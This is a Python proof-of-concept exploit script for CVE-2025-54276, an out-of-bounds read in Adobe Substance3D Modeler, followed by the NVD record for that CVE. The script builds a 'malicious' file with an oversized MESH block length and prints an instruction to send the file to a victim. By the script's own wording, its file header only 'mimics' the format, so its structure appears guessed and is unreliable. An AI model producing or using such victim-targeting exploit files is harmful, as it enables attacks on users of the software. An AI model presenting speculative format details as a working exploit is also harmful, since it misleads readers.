CVE-2025-54276

# CVE-2025-54276 - Adobe Substance3D Modeler Out-of-Bounds Read PoC # This PoC demonstrates the concept of triggering an out-of-bounds read # by crafting a malicious file with abnormal offset/length values. import struct import sys def create_malicious_modeler_file(output_path): """ Create a crafted file that triggers out-of-bounds read in Substance3D Modeler <= 1.22.3 """ # File header - mimicking a 3D model file format header = b'SBSM' # Magic bytes for Substance3D Modeler file header += struct.pack('<I', 1) # Version header += struct.pack('<I', 0) # Flags # Malicious data block with oversized length to trigger OOB read block_type = struct.pack('<I', 0x4D455348) # 'MESH' block type # Intentionally set an abnormally large data length # This will cause the parser to read past the allocated buffer malicious_length = struct.pack('<I', 0xFFFFFF00) # Oversized length value # Normal-looking mesh data (small actual payload) mesh_data = b'\x00' * 64 # Small actual data # Combine to create the malicious file malicious_file = header + block_type + malicious_length + mesh_data with open(output_path, 'wb') as f: f.write(malicious_file) print(f"[+] Malicious file created: {output_path}") print(f"[+] File size: {len(malicious_file)} bytes") print(f"[+] Malicious block length: 0x{malicious_length.hex()}") print("[!] Send this file to a victim using Substance3D Modeler <= 1.22.3") print("[!] When opened, it will trigger out-of-bounds read") if __name__ == "__main__": output = sys.argv[1] if len(sys.argv) > 1 else "malicious.sbs" create_malicious_modeler_file(output)

{"cve": {"id": "CVE-2025-54276", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:37.887", "lastModified": "2025-10-17T14:52:16.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.3 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.4", "matchCriteriaId": "E9633E88-E92B-4A01-A8E4-4F45BDD42C2F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb25-100.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}